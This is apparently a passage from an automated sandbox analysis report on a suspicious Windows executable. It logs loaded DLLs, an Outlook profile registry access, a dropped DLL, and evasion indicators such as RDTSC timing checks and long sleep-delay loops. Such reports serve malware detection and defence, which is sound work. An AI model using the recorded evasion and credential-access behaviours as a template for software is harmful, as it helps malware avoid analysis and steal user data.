            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: FILHKLtCw0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2868592478.0000000003DC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeFile created: C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeAPI/Special instruction interceptor: Address: 470EDDA
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeAPI/Special instruction interceptor: Address: 34CEDDA
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeRDTSC instruction interceptor: First address: 46C9044 second address: 46C9044 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F6C68D82065h 0x00000009 test bh, bh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeRDTSC instruction interceptor: First address: 3489044 second address: 3489044 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F6C68519E35h 0x00000009 test bh, bh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeMemory allocated: 360A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeMemory allocated: 380A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598684Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598266Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597850Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596421Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596312Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595875Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595541Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595218Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 595107Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594993Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594782Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594561Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594452Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594343Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 594234Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeWindow / User API: threadDelayed 7910Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeWindow / User API: threadDelayed 1934Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeAPI coverage: 2.8 %
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 3996Thread sleep count: 7910 > 30Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 3996Thread sleep count: 1934 > 30Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598684s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598577s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597850s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -596093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595541s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -595107s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594993s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594561s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exe TID: 7132Thread sleep time: -594234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598684Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598266Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597850Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596421Jump to behavior
            Source: C:\Users\user\Desktop\FILHKLtCw0.exeThread delayed: delay time: 596312Jump to behavior
